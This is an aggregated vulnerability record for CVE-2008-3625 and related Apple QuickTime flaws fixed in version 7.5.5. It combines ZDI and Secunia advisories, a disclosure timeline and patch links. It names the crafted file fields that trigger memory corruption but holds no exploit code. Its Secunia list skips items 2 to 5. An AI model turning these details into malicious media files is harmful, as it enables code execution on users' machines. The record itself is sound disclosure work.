advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------
VAR-200809-0198 CVE-2008-3625 Apple QuickTime In panorama track PDAT Atom handling stack-based buffer overflow vulnerability CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Stack-based buffer overflow in Apple QuickTime before 7.5.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a QuickTime Virtual Reality (QTVR) movie file with crafted (1) maxTilt, (2) minFieldOfView, and (3) maxFieldOfView elements in panorama track PDAT atoms. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists in the handling of panorama track PDAT atoms. When the maxTilt, minFieldOfView and maxFieldOfView elements are corrupted, a stack buffer overflow occurs which can be further leveraged to execute arbitrary code under the context of the current user. These issues arise when the application handles specially crafted PICT image files, movies, and QTVR movies. Successful exploits may allow attackers to gain remote unauthorized access in the context of a vulnerable user and to trigger a denial-of-service condition. Versions prior to QuickTime 7.5.5 are affected. NOTE: Two issues that were previously covered in this BID were given their own records to better document the details: - CVE-2008-3626 was moved to BID 31546 ('Apple QuickTime 'STSZ' Atoms Memory Corruption Vulnerability') - CVE-2008-3629 was moved to BID 31548 ('Apple QuickTime PICT Denial of Service Vulnerability'). Apple QuickTime is a very popular multimedia player. Remote attackers can use specially constructed PICT pictures to cause program crashes and denial of service. This attack is related to null pointer assignment. ZDI-08-058: Apple QuickTime Panorama PDAT Atom Parsing Buffer Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-058 September 9, 2008 -- CVE ID: CVE-2008-3625 -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6242. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT3027 -- Disclosure Timeline: 2008-06-25 - Vulnerability reported to vendor 2008-09-09 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmaster@3com.com. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . ---------------------------------------------------------------------- We have updated our website, enjoy! http://secunia.com/ ---------------------------------------------------------------------- TITLE: Apple QuickTime Multiple Vulnerabilities SECUNIA ADVISORY ID: SA31821 VERIFY ADVISORY: http://secunia.com/advisories/31821/ CRITICAL: Highly critical IMPACT: System access WHERE: >From remote SOFTWARE: Apple QuickTime 7.x http://secunia.com/advisories/product/5090/ DESCRIPTION: Multiple vulnerabilities have been reported in QuickTime, which can be exploited by malicious people to compromise a user's system. 1) An error in the third-party Indeo5 codec for QuickTime can be exploited to access uninitialised memory via a specially crafted movie file. 6) An error in the CallComponentFunctionWithStorage() function when parsing STSZ atoms in movie files can be exploited to corrupt memory via a movie file containing a overly large entry in sample_size_table. 7) Multiple errors when parsing H.264 encoded movie files (e.g. an integer overflow when parsing AVC1 atoms and two errors when parsing MDAT atoms) can be exploited to corrupt memory via a specially crafted file. Successful exploitation of the vulnerabilities may allow execution of arbitrary code. SOLUTION: Update to version 7.5.5. QuickTime 7.5.5 for Windows: http://www.apple.com/support/downloads/quicktime755forwindows.html QuickTime 7.5.5 for Leopard: http://www.apple.com/support/downloads/quicktime755forleopard.html QuickTime 7.5.5 for Tiger: http://www.apple.com/support/downloads/quicktime755fortiger.html PROVIDED AND/OR DISCOVERED BY: 1) The vendor credits Paul Byrne, NGSSoftware. 2) Reported by an anonymous person via ZDI. 3) The vendor credits Roee Hay, IBM Rational Application Security Research Group. 4) Reported by an anonymous person via ZDI. 5) Reported by an anonymous person via iDefense VCP. 6) Reported by an anonymous person via ZDI. 7) Reported by an anonymous person and Subreption via ZDI. 8) The vendor credits David Wharton. ORIGINAL ADVISORY: Apple: http://support.apple.com/kb/HT3027 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-08-057/ http://www.zerodayinitiative.com/advisories/ZDI-08-058/ http://www.zerodayinitiative.com/advisories/ZDI-08-059/ http://www.zerodayinitiative.com/advisories/ZDI-08-060/ http://www.zerodayinitiative.com/advisories/ZDI-08-061/ http://www.zerodayinitiative.com/advisories/ZDI-08-062/ iDefense VCP: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=744 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------